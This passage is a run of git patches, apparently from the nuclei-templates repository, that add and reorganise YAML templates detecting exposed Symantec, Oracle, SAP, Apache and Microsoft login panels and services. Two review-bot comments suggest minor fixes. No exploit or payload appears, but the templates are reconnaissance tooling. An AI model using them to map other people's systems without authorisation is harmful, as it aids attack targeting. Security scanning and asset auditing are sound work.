From abaac750f928a47b03278ee8bebae9ce41ffe52c Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 12 Sep 2021 22:19:01 +0530 Subject: [PATCH 189/339] Update oracle-integrated-manager.yaml --- exposed-panels/oracle-integrated-manager.yaml | 7 +++++++ 1 file changed, 7 insertions(+) diff --git a/exposed-panels/oracle-integrated-manager.yaml b/exposed-panels/oracle-integrated-manager.yaml index 13aa0c5c1b..c87585cf6e 100644 --- a/exposed-panels/oracle-integrated-manager.yaml +++ b/exposed-panels/oracle-integrated-manager.yaml @@ -22,3 +22,10 @@ requests: - type: status status: - 200 + + extractors: + - type: regex + part: body + group: 1 + regex: + - 'id="hostname">([a-z0-9-]+)<\/span><\/td>' From 4512b1c88a67220afd4060b55661abfc8f709d75 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 12 Sep 2021 22:34:36 +0530 Subject: [PATCH 190/339] Update and rename symantec-ewep.yaml to symantec-ewep-detect.yaml --- .../{symantec-ewep.yaml => symantec-ewep-detect.yaml} | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) rename exposed-panels/{symantec-ewep.yaml => symantec-ewep-detect.yaml} (75%) diff --git a/exposed-panels/symantec-ewep.yaml b/exposed-panels/symantec-ewep-detect.yaml similarity index 75% rename from exposed-panels/symantec-ewep.yaml rename to exposed-panels/symantec-ewep-detect.yaml index 517d468a5c..f735ab3604 100644 --- a/exposed-panels/symantec-ewep.yaml +++ b/exposed-panels/symantec-ewep-detect.yaml @@ -1,10 +1,10 @@ -id: symantec-ewep +id: symantec-ewep-detect info: - name: Detect Symantec Encryption Web Email Protection + name: Symantec Encryption Web Email Protection Detect author: johnk3r severity: info - tags: panel + tags: panel,symantec requests: - method: GET From f1f59f6fe5fb9fb6c3d727e62879af216a66bc33 Mon Sep 17 00:00:00 2001 
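Review bot: The hostname extractor regex `id="hostname">([a-z0-9-]+)<\/span><\/td>` is case-sensitive and excludes dots, so an ILOM reporting an uppercase label or a fully qualified name (e.g. `ILOM-SERVER01.corp.example`) is not captured and the extractor silently returns nothing. Use `'id="hostname">([A-Za-z0-9.-]+)</span></td>'` (the `/` needs no escaping in Go's regex syntax). Whether ILOM ever reports an FQDN here could not be confirmed from the template; if it is always a bare label, widening the character class still costs nothing.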
From: Prince Chaddha Date: Sun, 12 Sep 2021 22:44:14 +0530 Subject: [PATCH 191/339] Create symantec-endpoint-manager.yaml --- .../symantec/symantec-endpoint-manager.yaml | 24 +++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 exposed-panels/symantec/symantec-endpoint-manager.yaml diff --git a/exposed-panels/symantec/symantec-endpoint-manager.yaml b/exposed-panels/symantec/symantec-endpoint-manager.yaml new file mode 100644 index 0000000000..f90d195530 --- /dev/null +++ b/exposed-panels/symantec/symantec-endpoint-manager.yaml @@ -0,0 +1,24 @@ +id: symantec-endpoint-manager + +info: + name: Symantec Endpoint Protection Manager + author: princechaddha + severity: info + reference: https://www.shodan.io/search?query=http.title%3A%22Symantec+Endpoint+Protection+Manager%22 + tags: symantec,panel,login + +requests: + - method: GET + path: + - '{{BaseURL}}' + + matchers-condition: and + matchers: + - type: word + words: + - "Symantec Endpoint Protection Manager" + part: body + + - type: status + status: + - 200 From 2478812b3fa8fab9651fbcae64ec1b18e40d32de Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 12 Sep 2021 22:46:25 +0530 Subject: [PATCH 192/339] Update and rename exposed-panels/symantec-ewep-detect.yaml to exposed-panels/symantec/symantec-ewep-detect.yaml --- exposed-panels/{ => symantec}/symantec-ewep-detect.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) rename exposed-panels/{ => symantec}/symantec-ewep-detect.yaml (74%) diff --git a/exposed-panels/symantec-ewep-detect.yaml b/exposed-panels/symantec/symantec-ewep-detect.yaml similarity index 74% rename from exposed-panels/symantec-ewep-detect.yaml rename to exposed-panels/symantec/symantec-ewep-detect.yaml index f735ab3604..7461ae8a06 100644 --- a/exposed-panels/symantec-ewep-detect.yaml +++ b/exposed-panels/symantec/symantec-ewep-detect.yaml 
@@ -4,7 +4,7 @@ info: name: Symantec Encryption Web Email Protection Detect author: johnk3r severity: info - tags: panel,symantec + tags: panel,symantec,login requests: - method: GET @@ -15,7 +15,7 @@ requests: matchers: - type: word words: - - "Symantec Corporation. All Rights Reserved" + - "Symantec Encryption Server: Web Email Protection - Login" part: body - type: status From fc041660f7610265b9287b45a956239430dc2c05 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 12 Sep 2021 22:47:12 +0530 Subject: [PATCH 193/339] Update and rename symantec-endpoint-manager.yaml to symantec-epm-login.yaml --- .../{symantec-endpoint-manager.yaml => symantec-epm-login.yaml} | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) rename exposed-panels/symantec/{symantec-endpoint-manager.yaml => symantec-epm-login.yaml} (94%) diff --git a/exposed-panels/symantec/symantec-endpoint-manager.yaml b/exposed-panels/symantec/symantec-epm-login.yaml similarity index 94% rename from exposed-panels/symantec/symantec-endpoint-manager.yaml rename to exposed-panels/symantec/symantec-epm-login.yaml index f90d195530..4b06e8b789 100644 --- a/exposed-panels/symantec/symantec-endpoint-manager.yaml +++ b/exposed-panels/symantec/symantec-epm-login.yaml @@ -1,4 +1,4 @@ -id: symantec-endpoint-manager +id: symantec-epm-login info: name: Symantec Endpoint Protection Manager From 25037e4bb68b3727ae36fa6d1c5c22683320af1d Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 12 Sep 2021 22:47:36 +0530 Subject: [PATCH 194/339] Update and rename symantec-ewep-detect.yaml to symantec-ewep-login.yaml --- .../{symantec-ewep-detect.yaml => symantec-ewep-login.yaml} | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) rename exposed-panels/symantec/{symantec-ewep-detect.yaml => symantec-ewep-login.yaml} (82%) 
diff --git a/exposed-panels/symantec/symantec-ewep-detect.yaml b/exposed-panels/symantec/symantec-ewep-login.yaml similarity index 82% rename from exposed-panels/symantec/symantec-ewep-detect.yaml rename to exposed-panels/symantec/symantec-ewep-login.yaml index 7461ae8a06..954f4b1e22 100644 --- a/exposed-panels/symantec/symantec-ewep-detect.yaml +++ b/exposed-panels/symantec/symantec-ewep-login.yaml @@ -1,7 +1,7 @@ -id: symantec-ewep-detect +id: symantec-ewep-login info: - name: Symantec Encryption Web Email Protection Detect + name: Symantec Encryption Web Email Protection author: johnk3r severity: info tags: panel,symantec,login From 9da0058ecda05a2a6558c13e199d795fad37270b Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 12 Sep 2021 22:51:15 +0530 Subject: [PATCH 195/339] Create symantec-dlp-login.yaml --- .../symantec/symantec-dlp-login.yaml | 24 +++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 exposed-panels/symantec/symantec-dlp-login.yaml diff --git a/exposed-panels/symantec/symantec-dlp-login.yaml b/exposed-panels/symantec/symantec-dlp-login.yaml new file mode 100644 index 0000000000..5034c5453c --- /dev/null +++ b/exposed-panels/symantec/symantec-dlp-login.yaml @@ -0,0 +1,24 @@ +id: symantec-dlp-login + +info: + name: Symantec Data Loss Prevention + author: princechaddha + severity: info + reference: https://www.shodan.io/search?query=http.title%3A%22Symantec+Endpoint+Protection+Manager%22 + tags: symantec,panel,login + +requests: + - method: GET + path: + - '{{BaseURL}}/ProtectManager/Logon' + + matchers-condition: and + matchers: + - type: word + words: + - "Symantec Data Loss Prevention" + part: body + + - type: status + status: + - 200 From a6f9ff01dffb179827e5a98a793896ed0208f9ca Mon Sep 17 00:00:00 2001 
From: Prince Chaddha Date: Sun, 12 Sep 2021 22:55:00 +0530 Subject: [PATCH 196/339] Create symantec-pgp-global-directory.yaml --- .../symantec-pgp-global-directory.yaml | 24 +++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 exposed-panels/symantec/symantec-pgp-global-directory.yaml diff --git a/exposed-panels/symantec/symantec-pgp-global-directory.yaml b/exposed-panels/symantec/symantec-pgp-global-directory.yaml new file mode 100644 index 0000000000..15f11d8c65 --- /dev/null +++ b/exposed-panels/symantec/symantec-pgp-global-directory.yaml @@ -0,0 +1,24 @@ +id: symantec-pgp-global-directory + +info: + name: Symantec PGP Global Directory + author: princechaddha + severity: info + reference: https://www.shodan.io/search?query=http.title%3A%22PGP+Global+Directory%22 + tags: symantec,panel + +requests: + - method: GET + path: + - '{{BaseURL}}/vkd/GetWelcomeScreen.event' + + matchers-condition: and + matchers: + - type: word + words: + - "PGP Global Directory" + part: body + + - type: status + status: + - 200 From 85762d9986de8fca77a53ab4db517c771e7386c7 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 12 Sep 2021 22:55:21 +0530 Subject: [PATCH 197/339] Update symantec-dlp-login.yaml --- exposed-panels/symantec/symantec-dlp-login.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/exposed-panels/symantec/symantec-dlp-login.yaml b/exposed-panels/symantec/symantec-dlp-login.yaml index 5034c5453c..b4e614e6e8 100644 --- a/exposed-panels/symantec/symantec-dlp-login.yaml +++ b/exposed-panels/symantec/symantec-dlp-login.yaml @@ -4,7 +4,7 @@ info: name: Symantec Data Loss Prevention author: princechaddha severity: info - reference: https://www.shodan.io/search?query=http.title%3A%22Symantec+Endpoint+Protection+Manager%22 + reference: https://www.shodan.io/search?query=http.title%3A%22Symantec+Data+Loss+Prevention%22 tags: symantec,panel,login requests: From 3a88fbd0c96f9fd8cfc16f02613a902f69e80e7b Mon Sep 17 00:00:00 2001 
From: Prince Chaddha Date: Sun, 12 Sep 2021 22:56:10 +0530 Subject: [PATCH 198/339] Update symantec-ewep-login.yaml --- exposed-panels/symantec/symantec-ewep-login.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/exposed-panels/symantec/symantec-ewep-login.yaml b/exposed-panels/symantec/symantec-ewep-login.yaml index 954f4b1e22..bf1d69c06b 100644 --- a/exposed-panels/symantec/symantec-ewep-login.yaml +++ b/exposed-panels/symantec/symantec-ewep-login.yaml @@ -4,6 +4,7 @@ info: name: Symantec Encryption Web Email Protection author: johnk3r severity: info + reference: https://www.shodan.io/search?query=http.title%3A%22Symantec+Encryption+Server%3A+Web+Email+Protection+-+Login%22 tags: panel,symantec,login requests: From 7910a9492e91dc18d8aa7f03b0427c8d4c2265f3 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 12 Sep 2021 22:59:03 +0530 Subject: [PATCH 199/339] Update oracle-dbass-detect.yaml --- technologies/oracle-dbass-detect.yaml | 9 ++++++--- 1 file changed, 6 insertions(+), 3 deletions(-) diff --git a/technologies/oracle-dbass-detect.yaml b/technologies/oracle-dbass-detect.yaml index 2c6406bb5d..2a2c6a7b78 100644 --- a/technologies/oracle-dbass-detect.yaml +++ b/technologies/oracle-dbass-detect.yaml @@ -1,18 +1,21 @@ -id: oracle-DBaaS Monitor-service +id: oracle-dbass-detect info: - name: DBaaS Monitor Detect + name: Oracle DBaaS Monitor Detect author: pussycat0x severity: info tags: oracle,tech + requests: - method: GET path: - '{{BaseURL}}/dbaas_monitor/login' + matchers-condition: and matchers: - type: word words: - 'DBaaS Monitor' + - type: status status: - - 200 \ No newline at end of file + - 200 From e4a65e4f85d5dbd270019e322d955f0314ab84d4 Mon Sep 17 00:00:00 2001 
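Review bot: The new id `oracle-dbass-detect` keeps what looks like a typo of `dbaas`: the request path in the same hunk is `/dbaas_monitor/login`, the name is now `Oracle DBaaS Monitor Detect`, and the rename later in this series (PATCH 201) carries `oracle-dbass-detect.yaml` into `technologies/oracle/` with the same spelling. Since template ids are what users filter and search on, `id: oracle-dbaas-detect` with the file renamed to match would avoid cementing the misspelling. The word matcher `- 'DBaaS Monitor'` also has no `part:` line; PATCH 200, the next commit, adds `part: body` to the sibling oracle-dbcs template, so adding `part: body` here keeps the two consistent (nuclei appears to default to the body, so this is a style point rather than a behavioural one).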
From: Prince Chaddha Date: Sun, 12 Sep 2021 23:00:40 +0530 Subject: [PATCH 200/339] Update and rename technologies/oracle-dbcs.yaml to technologies/oracle/oracle-dbcs.yaml --- technologies/{ => oracle}/oracle-dbcs.yaml | 8 ++++++-- 1 file changed, 6 insertions(+), 2 deletions(-) rename technologies/{ => oracle}/oracle-dbcs.yaml (84%) diff --git a/technologies/oracle-dbcs.yaml b/technologies/oracle/oracle-dbcs.yaml similarity index 84% rename from technologies/oracle-dbcs.yaml rename to technologies/oracle/oracle-dbcs.yaml index d1c8891335..4dd45891c6 100644 --- a/technologies/oracle-dbcs.yaml +++ b/technologies/oracle/oracle-dbcs.yaml @@ -1,19 +1,23 @@ -id: oracle-database-service +id: oracle-dbcs info: name: Oracle Database as a Service author: pussycat0x severity: info reference: https://www.shodan.io/search?query=http.title%3A%22Oracle+Database+as+a+Service%22 tags: oracle,tech + requests: - method: GET path: - '{{BaseURL}}' + matchers-condition: and matchers: - type: word words: - 'Oracle Database as a Service' + part: body + - type: status status: - - 200 \ No newline at end of file + - 200 From c79276349f8172be9865f300fe922a485bf5bc11 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 12 Sep 2021 23:01:04 +0530 Subject: [PATCH 201/339] Rename technologies/oracle-dbass-detect.yaml to technologies/oracle/oracle-dbass-detect.yaml --- technologies/{ => oracle}/oracle-dbass-detect.yaml | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename technologies/{ => oracle}/oracle-dbass-detect.yaml (100%) diff --git a/technologies/oracle-dbass-detect.yaml b/technologies/oracle/oracle-dbass-detect.yaml similarity index 100% rename from technologies/oracle-dbass-detect.yaml rename to technologies/oracle/oracle-dbass-detect.yaml From 6cd0920ed0fbe517d4e75aa399f962539dc2d613 Mon Sep 17 00:00:00 2001 
From: Prince Chaddha Date: Sun, 12 Sep 2021 23:01:55 +0530 Subject: [PATCH 202/339] Update and rename technologies/default-oracle-application-page.yaml to technologies/oracle/default-oracle-application-page.yaml --- technologies/{ => oracle}/default-oracle-application-page.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) rename technologies/{ => oracle}/default-oracle-application-page.yaml (99%) diff --git a/technologies/default-oracle-application-page.yaml b/technologies/oracle/default-oracle-application-page.yaml similarity index 99% rename from technologies/default-oracle-application-page.yaml rename to technologies/oracle/default-oracle-application-page.yaml index 263c5493f5..1cc6853a67 100644 --- a/technologies/default-oracle-application-page.yaml +++ b/technologies/oracle/default-oracle-application-page.yaml @@ -4,13 +4,14 @@ info: name: Oracle Application Server Containers author: dhiyaneshDk severity: info - tags: tech,oracle reference: https://www.shodan.io/search?query=http.title%3A%22Oracle+Application+Server+Containers%22 + tags: tech,oracle requests: - method: GET path: - '{{BaseURL}}' + matchers: - type: word words: From 9feadf453522eb6b7cdf4d4acf5e328d61afbbbd Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 12 Sep 2021 23:02:24 +0530 Subject: [PATCH 203/339] Update and rename technologies/oracle-iplanet-web-server.yaml to technologies/oracle/oracle-iplanet-web-server.yaml --- technologies/{ => oracle}/oracle-iplanet-web-server.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) rename technologies/{ => oracle}/oracle-iplanet-web-server.yaml (91%) diff --git a/technologies/oracle-iplanet-web-server.yaml b/technologies/oracle/oracle-iplanet-web-server.yaml similarity index 91% rename from technologies/oracle-iplanet-web-server.yaml rename to technologies/oracle/oracle-iplanet-web-server.yaml index 12d06c6232..df262b7c1e 100644 --- a/technologies/oracle-iplanet-web-server.yaml 
+++ b/technologies/oracle/oracle-iplanet-web-server.yaml @@ -16,10 +16,10 @@ requests: matchers-condition: and matchers: - type: word - part: body words: - "Oracle iPlanet Web Server" + part: body - type: status status: - - 200 \ No newline at end of file + - 200 From fa4f2ee50db8f011a9dc6514279a1d0c70ab60f2 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 12 Sep 2021 23:04:32 +0530 Subject: [PATCH 204/339] Update and rename technologies/adobe-coldfusion-detector-error.yaml to technologies/adobe/adobe-coldfusion-detect.yaml --- .../adobe-coldfusion-detect.yaml} | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) rename technologies/{adobe-coldfusion-detector-error.yaml => adobe/adobe-coldfusion-detect.yaml} (93%) diff --git a/technologies/adobe-coldfusion-detector-error.yaml b/technologies/adobe/adobe-coldfusion-detect.yaml similarity index 93% rename from technologies/adobe-coldfusion-detector-error.yaml rename to technologies/adobe/adobe-coldfusion-detect.yaml index ef5d2b03b2..890cc265ce 100644 --- a/technologies/adobe-coldfusion-detector-error.yaml +++ b/technologies/adobe/adobe-coldfusion-detect.yaml @@ -1,4 +1,4 @@ -id: adobe-coldfusion-detector-error +id: adobe-coldfusion-detect info: name: Adobe ColdFusion Detector From 801a048b9ca7b4813d8879cc38519bc3c1e3e67d Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 12 Sep 2021 23:05:35 +0530 Subject: [PATCH 205/339] Update and rename adobe-coldfusion-detect.yaml to adobe-coldfusion-error-detect.yaml --- ...oldfusion-detect.yaml => adobe-coldfusion-error-detect.yaml} | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) rename technologies/adobe/{adobe-coldfusion-detect.yaml => adobe-coldfusion-error-detect.yaml} (94%) 
diff --git a/technologies/adobe/adobe-coldfusion-detect.yaml b/technologies/adobe/adobe-coldfusion-error-detect.yaml similarity index 94% rename from technologies/adobe/adobe-coldfusion-detect.yaml rename to technologies/adobe/adobe-coldfusion-error-detect.yaml index 890cc265ce..c6e8e0d1ea 100644 --- a/technologies/adobe/adobe-coldfusion-detect.yaml +++ b/technologies/adobe/adobe-coldfusion-error-detect.yaml @@ -1,4 +1,4 @@ -id: adobe-coldfusion-detect +id: adobe-coldfusion-error-detect info: name: Adobe ColdFusion Detector From c84dee1ce1643c8b67da17e4e2d7e8f66e5f8942 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 12 Sep 2021 23:06:01 +0530 Subject: [PATCH 206/339] Update and rename adobe-coldfusion-detector.yaml to adobe-coldfusion-detect.yaml --- ...-coldfusion-detector.yaml => adobe-coldfusion-detect.yaml} | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) rename technologies/{adobe-coldfusion-detector.yaml => adobe-coldfusion-detect.yaml} (97%) diff --git a/technologies/adobe-coldfusion-detector.yaml b/technologies/adobe-coldfusion-detect.yaml similarity index 97% rename from technologies/adobe-coldfusion-detector.yaml rename to technologies/adobe-coldfusion-detect.yaml index 9dee636d31..0d9330c87c 100644 --- a/technologies/adobe-coldfusion-detector.yaml +++ b/technologies/adobe-coldfusion-detect.yaml @@ -1,4 +1,4 @@ -id: adobe-coldfusion-detector +id: adobe-coldfusion-detect info: name: Adobe ColdFusion Detector @@ -59,4 +59,4 @@ requests: - type: dsl name: "coldfusion-mx-7" dsl: - - "status_code==200 && (\"cb594e69af5ba15bca453f76aca53615\" == md5(body))" \ No newline at end of file + - "status_code==200 && (\"cb594e69af5ba15bca453f76aca53615\" == md5(body))" From b865f30ac856d5cd73adeca1cc0a15835b40b2e9 Mon Sep 17 00:00:00 2001 
From: Prince Chaddha Date: Sun, 12 Sep 2021 23:06:48 +0530 Subject: [PATCH 207/339] Rename technologies/apache-axis-detect.yaml to technologies/apache/apache-axis-detect.yaml --- technologies/{ => apache}/apache-axis-detect.yaml | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename technologies/{ => apache}/apache-axis-detect.yaml (100%) diff --git a/technologies/apache-axis-detect.yaml b/technologies/apache/apache-axis-detect.yaml similarity index 100% rename from technologies/apache-axis-detect.yaml rename to technologies/apache/apache-axis-detect.yaml From 2fef2e3cec34c6ded30d49c4b6b136310ec0e0e1 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 12 Sep 2021 23:07:16 +0530 Subject: [PATCH 208/339] Rename technologies/apache-detect.yaml to technologies/apache/apache-detect.yaml --- technologies/{ => apache}/apache-detect.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) rename technologies/{ => apache}/apache-detect.yaml (96%) diff --git a/technologies/apache-detect.yaml b/technologies/apache/apache-detect.yaml similarity index 96% rename from technologies/apache-detect.yaml rename to technologies/apache/apache-detect.yaml index 4db33ceb08..eeb8966be3 100644 --- a/technologies/apache-detect.yaml +++ b/technologies/apache/apache-detect.yaml @@ -27,4 +27,4 @@ requests: - type: kval part: header kval: - - Server \ No newline at end of file + - Server From 364a825318fa52d346ce6a2d2bef2af27f257ccd Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 12 Sep 2021 23:07:25 +0530 Subject: [PATCH 209/339] Rename technologies/apache-guacamole.yaml to technologies/apache/apache-guacamole.yaml --- technologies/{ => apache}/apache-guacamole.yaml | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename technologies/{ => apache}/apache-guacamole.yaml (100%) 
diff --git a/technologies/apache-guacamole.yaml b/technologies/apache/apache-guacamole.yaml similarity index 100% rename from technologies/apache-guacamole.yaml rename to technologies/apache/apache-guacamole.yaml From a2cb1b2882fd5d143673d36b6c4b56191e1b2d8c Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 12 Sep 2021 23:07:35 +0530 Subject: [PATCH 210/339] Rename technologies/default-apache-test-page.yaml to technologies/apache/default-apache-test-page.yaml --- technologies/{ => apache}/default-apache-test-page.yaml | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename technologies/{ => apache}/default-apache-test-page.yaml (100%) diff --git a/technologies/default-apache-test-page.yaml b/technologies/apache/default-apache-test-page.yaml similarity index 100% rename from technologies/default-apache-test-page.yaml rename to technologies/apache/default-apache-test-page.yaml From dc95ae40fa64e549d46d678709354051fe7467fd Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 12 Sep 2021 23:07:43 +0530 Subject: [PATCH 211/339] Rename technologies/default-apache2-page.yaml to technologies/apache/default-apache2-page.yaml --- technologies/{ => apache}/default-apache2-page.yaml | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename technologies/{ => apache}/default-apache2-page.yaml (100%) diff --git a/technologies/default-apache2-page.yaml b/technologies/apache/default-apache2-page.yaml similarity index 100% rename from technologies/default-apache2-page.yaml rename to technologies/apache/default-apache2-page.yaml From c561f96d27be85790f7e46ceea9b0e5f2b161a70 Mon Sep 17 00:00:00 2001 
From: Prince Chaddha Date: Sun, 12 Sep 2021 23:07:50 +0530 Subject: [PATCH 212/339] Rename technologies/default-apache2-ubuntu-page.yaml to technologies/apache/default-apache2-ubuntu-page.yaml --- technologies/{ => apache}/default-apache2-ubuntu-page.yaml | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename technologies/{ => apache}/default-apache2-ubuntu-page.yaml (100%) diff --git a/technologies/default-apache2-ubuntu-page.yaml b/technologies/apache/default-apache2-ubuntu-page.yaml similarity index 100% rename from technologies/default-apache2-ubuntu-page.yaml rename to technologies/apache/default-apache2-ubuntu-page.yaml From a0ff68f00555fbb2ae03ae3168c422e22a7032c3 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 12 Sep 2021 23:08:32 +0530 Subject: [PATCH 213/339] Rename technologies/sap-igs-detect.yaml to technologies/sap/sap-igs-detect.yaml --- technologies/{ => sap}/sap-igs-detect.yaml | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename technologies/{ => sap}/sap-igs-detect.yaml (100%) diff --git a/technologies/sap-igs-detect.yaml b/technologies/sap/sap-igs-detect.yaml similarity index 100% rename from technologies/sap-igs-detect.yaml rename to technologies/sap/sap-igs-detect.yaml From b32c7eb44d9e4f3f05017634a1f8e5b03f2629dc Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 12 Sep 2021 23:08:50 +0530 Subject: [PATCH 214/339] Rename technologies/sap-netweaver-detect.yaml to technologies/sap/sap-netweaver-detect.yaml --- technologies/{ => sap}/sap-netweaver-detect.yaml | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename technologies/{ => sap}/sap-netweaver-detect.yaml (100%) diff --git a/technologies/sap-netweaver-detect.yaml b/technologies/sap/sap-netweaver-detect.yaml similarity index 100% rename from technologies/sap-netweaver-detect.yaml rename to technologies/sap/sap-netweaver-detect.yaml From cd29d6bcecefb12cb31290ea220e02d5371eca96 Mon Sep 17 00:00:00 2001 
From: Prince Chaddha Date: Sun, 12 Sep 2021 23:08:56 +0530 Subject: [PATCH 215/339] Rename technologies/sap-netweaver-webgui.yaml to technologies/sap/sap-netweaver-webgui.yaml --- technologies/{ => sap}/sap-netweaver-webgui.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) rename technologies/{ => sap}/sap-netweaver-webgui.yaml (95%) diff --git a/technologies/sap-netweaver-webgui.yaml b/technologies/sap/sap-netweaver-webgui.yaml similarity index 95% rename from technologies/sap-netweaver-webgui.yaml rename to technologies/sap/sap-netweaver-webgui.yaml index ca76355018..6562effe35 100644 --- a/technologies/sap-netweaver-webgui.yaml +++ b/technologies/sap/sap-netweaver-webgui.yaml @@ -20,4 +20,4 @@ requests: words: - "sap-system-login" - "Logon" - condition: or \ No newline at end of file + condition: or From 3594025e4d785c241ac207bda8971a2c2e46411a Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 12 Sep 2021 23:09:03 +0530 Subject: [PATCH 216/339] Rename technologies/sap-web-dispatcher-admin-portal.yaml to technologies/sap/sap-web-dispatcher-admin-portal.yaml --- technologies/{ => sap}/sap-web-dispatcher-admin-portal.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) rename technologies/{ => sap}/sap-web-dispatcher-admin-portal.yaml (94%) diff --git a/technologies/sap-web-dispatcher-admin-portal.yaml b/technologies/sap/sap-web-dispatcher-admin-portal.yaml similarity index 94% rename from technologies/sap-web-dispatcher-admin-portal.yaml rename to technologies/sap/sap-web-dispatcher-admin-portal.yaml index f6f7c62464..1d5183b56a 100644 --- a/technologies/sap-web-dispatcher-admin-portal.yaml +++ b/technologies/sap/sap-web-dispatcher-admin-portal.yaml @@ -35,4 +35,4 @@ requests: condition: or words: - "SAP Web Dispatcher" - - "Administration" \ No newline at end of file + - "Administration" From ce8a9c5098a120e3a331d4922c8f1f0637aa38f9 Mon Sep 17 00:00:00 2001 
From: Prince Chaddha Date: Sun, 12 Sep 2021 23:09:09 +0530 Subject: [PATCH 217/339] Rename technologies/sap-web-dispatcher.yaml to technologies/sap/sap-web-dispatcher.yaml --- technologies/{ => sap}/sap-web-dispatcher.yaml | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename technologies/{ => sap}/sap-web-dispatcher.yaml (100%) diff --git a/technologies/sap-web-dispatcher.yaml b/technologies/sap/sap-web-dispatcher.yaml similarity index 100% rename from technologies/sap-web-dispatcher.yaml rename to technologies/sap/sap-web-dispatcher.yaml From 3991fac5e3390ee055110b01d062ec528fdb2fa0 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 12 Sep 2021 23:09:30 +0530 Subject: [PATCH 218/339] Rename technologies/adobe-coldfusion-detect.yaml to technologies/adobe/adobe-coldfusion-detect.yaml --- technologies/{ => adobe}/adobe-coldfusion-detect.yaml | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename technologies/{ => adobe}/adobe-coldfusion-detect.yaml (100%) diff --git a/technologies/adobe-coldfusion-detect.yaml b/technologies/adobe/adobe-coldfusion-detect.yaml similarity index 100% rename from technologies/adobe-coldfusion-detect.yaml rename to technologies/adobe/adobe-coldfusion-detect.yaml From 16db1dc76ae2f89a52b2d81c17d309bc8f58453f Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 12 Sep 2021 23:09:47 +0530 Subject: [PATCH 219/339] Rename technologies/airflow-detect.yaml to technologies/apache/airflow-detect.yaml --- technologies/{ => apache}/airflow-detect.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) rename technologies/{ => apache}/airflow-detect.yaml (95%) diff --git a/technologies/airflow-detect.yaml b/technologies/apache/airflow-detect.yaml similarity index 95% rename from technologies/airflow-detect.yaml rename to technologies/apache/airflow-detect.yaml index f2d6d97aa2..5306691e5b 100644 --- a/technologies/airflow-detect.yaml +++ b/technologies/apache/airflow-detect.yaml 
@@ -21,4 +21,4 @@ requests: - type: status status: - - 404 \ No newline at end of file + - 404 From aca84e760f971a87ac6f82d85c5f5361df49b6d2 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 12 Sep 2021 23:11:52 +0530 Subject: [PATCH 220/339] Rename technologies/default-iis7-page.yaml to technologies/microsoft/default-iis7-page.yaml --- technologies/{ => microsoft}/default-iis7-page.yaml | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename technologies/{ => microsoft}/default-iis7-page.yaml (100%) diff --git a/technologies/default-iis7-page.yaml b/technologies/microsoft/default-iis7-page.yaml similarity index 100% rename from technologies/default-iis7-page.yaml rename to technologies/microsoft/default-iis7-page.yaml From 09b8c69166d823240a5733b9893d05b98efdb32c Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 12 Sep 2021 23:11:59 +0530 Subject: [PATCH 221/339] Rename technologies/default-microsoft-azure-page.yaml to technologies/microsoft/default-microsoft-azure-page.yaml --- technologies/{ => microsoft}/default-microsoft-azure-page.yaml | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename technologies/{ => microsoft}/default-microsoft-azure-page.yaml (100%) diff --git a/technologies/default-microsoft-azure-page.yaml b/technologies/microsoft/default-microsoft-azure-page.yaml similarity index 100% rename from technologies/default-microsoft-azure-page.yaml rename to technologies/microsoft/default-microsoft-azure-page.yaml From 670f3b67c0bd091d3a04e0d54453511356325a3a Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: 